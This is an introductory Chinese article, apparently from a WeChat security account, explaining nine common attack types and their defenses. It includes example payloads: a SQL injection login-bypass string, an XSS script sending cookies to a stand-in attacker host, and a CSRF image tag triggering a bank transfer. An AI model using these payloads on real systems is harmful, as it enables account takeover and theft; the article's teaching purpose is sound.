关注兰花豆，探讨网络安全

一、SQL注入

原理与危害

SQL注入（SQL Injection）是一种通过操纵输入参数篡改数据库查询语句的攻击方式。攻击者利用未经验证的用户输入，将恶意SQL代码注入到后台数据库中，从而窃取、篡改或删除数据。例如，攻击者在登录表单中输入' OR '1'='1，绕过密码验证直接访问系统。

防御策略

1. 参数化查询：使用预编译语句替代动态拼接SQL语句。

2. 输入过滤：对用户输入进行严格的格式验证，过滤特殊字符（如单引号、分号）。

二、DDoS

原理与危害

DDoS（分布式拒绝服务攻击）攻击通过控制大量“肉鸡”（被感染的设备）向目标服务器发送海量请求，耗尽带宽或系统资源，导致服务瘫痪。例如，2016年Mirai僵尸网络攻击导致美国东海岸大规模断网。

防御策略

1. 流量清洗：部署抗DDoS设备或云服务CDN识别并过滤异常流量。

2. 负载均衡：通过CDN分散流量压力，避免单点故障。

三、XSS

原理与危害

XSS（跨站脚本攻击）通过在网页中注入恶意脚本（如JavaScript），窃取用户Cookie或会话信息。例如，攻击者在评论区插入<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>，劫持用户会话。

防御策略

1. 输出编码：对用户提交的内容进行HTML实体转义（如将<转换为&lt;）。

2. 内容安全策略（CSP）：通过HTTP头限制脚本执行来源。

四、CSRF

原理与危害

CSRF（跨站请求伪造）利用用户已登录的身份，诱骗其点击恶意链接执行非授权操作。例如，用户访问含<img src="http://bank.com/transfer?to=attacker&amount=1000">的页面时，自动发起转账请求。

防御策略

1. Token验证：为每个表单生成唯一随机Token，验证请求来源。

2. SameSite Cookie：设置Cookie的SameSite属性为Strict或Lax。

五、暴力破解

原理与危害

攻击者通过自动化工具尝试大量用户名/密码组合，突破弱口令系统。例如，使用Hydra工具对SSH服务发起字典攻击。

防御策略

1. 账户锁定机制：连续失败登录后锁定账户或增加延迟。

2. 多因素认证（MFA）：结合密码、短信验证码或生物识别。

六、网络钓鱼

原理与危害

通过伪造官方网站或邮件诱导用户提交敏感信息。例如，伪装成银行发送“账户异常”邮件，引导用户点击钓鱼链接。

防御策略

1. 用户教育：培训员工识别钓鱼邮件特征（如发件人域名拼写错误）。

2. 邮件过滤技术：部署SPF、DKIM、DMARC协议验证邮件真实性。

七、近源攻击

原理与危害

攻击者通过物理接近目标实施攻击，如利用Wi-Fi伪造热点窃取数据，或通过USB Rubber Ducky插入恶意设备。

防御策略

1. 禁用无用接口：关闭办公设备的蓝牙、NFC等无线功能。

2. 网络分段：将访客网络与内部网络隔离。

3. 设备监控：部署USB端口管控工具，禁止未授权外设接入。

八、供应链攻击

原理与危害

通过感染软件供应商或硬件厂商的更新渠道传播恶意代码。例如，2020年SolarWinds事件中，攻击者篡改软件更新包入侵数万家机构。

防御策略

1. 代码签名验证：确保软件更新包的数字签名合法。

2. 供应链审计：对第三方供应商进行安全评估。

九、物理攻击

原理与危害

直接接触硬件设备进行破坏或数据窃取，如拆卸硬盘复制数据、使用冷启动攻击提取内存信息。

防御策略

1. 全盘加密：启用BitLocker等硬盘加密工具。

2. 物理安全措施：部署门禁系统、监控摄像头及机柜锁。

结论

网络安全威胁呈现多元化、隐蔽化的趋势，防御需采用“纵深防御”策略，结合技术手段与管理措施。未来，随着AI技术的应用，攻击检测与响应速度将进一步提升，但攻防对抗的本质不会改变——只有持续学习、动态调整防护策略，才能有效应对不断演变的网络威胁。

原文始发于微信公众号（兰花豆说网络安全）：网络安全入门必知的攻击方法